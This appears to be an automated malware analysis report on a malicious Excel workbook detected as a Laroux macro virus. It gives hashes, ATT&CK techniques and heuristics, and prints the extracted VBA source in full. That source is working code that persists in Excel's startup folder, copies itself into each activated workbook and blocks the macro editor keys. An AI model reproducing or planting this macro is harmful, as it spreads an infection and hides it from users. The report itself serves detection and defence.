Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 895e4d1aa5e90771…

MALICIOUS

Office (OLE)

Size: 21.5 KB
Created: 1996-12-17 01:32:42
Authoring application: Microsoft Excel
First seen: 2015-09-19
MD5: 004feda8c82d9cd171b09359cb9cf460
SHA-1: 85386bdb647f26be645a024db02f0cb1167a6b2c
SHA-256: 895e4d1aa5e90771739fc3989362dc2ccbd213f19a873a808101b11efa441044
Risk Score: 88

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The file is a malicious Excel document containing VBA macros. Its `auto_open` macro copies the workbook's "StartUp" sheet into the Excel startup folder as 'StartUp.xls' so that it is loaded on every Excel launch, achieving persistence. It also registers an `OnSheetActivate` handler and `OnKey` handlers for specific key presses (Alt+F11 and Alt+F8), likely to maintain control over opened workbooks and to evade inspection. The ClamAV detection 'Doc.Macro.Laroux-5893719-0' further supports the malicious classification.

Heuristics (3)

  • ClamAV: Doc.Macro.Laroux-5893719-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (severity: low; rule: OLE_VBA_AUTO)
    Matched line in script: Sub auto_open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 977 bytes
SHA-256: 2748440ec665e3a050db338ead70be0716fd2513779f96555735a09d74fb9511

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "StartUp"
Sub auto_open()
ThisWorkbook.Save
  On Error Resume Next
   MsgBox "", "", "我来了!"
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
   Application.ScreenUpdating = False
  ThisWorkbook.Sheets("StartUp").Copy
  ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
  n$ = ActiveWorkbook.Name
  ActiveWindow.Visible = False
  Workbooks("StartUp.xls").Save
  Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub ycop()
  On Error Resume Next
 If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
  Application.ScreenUpdating = False
   MsgBox "", "", "我又来了!"
 n$ = ActiveSheet.Name
 Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
 End If
    End Sub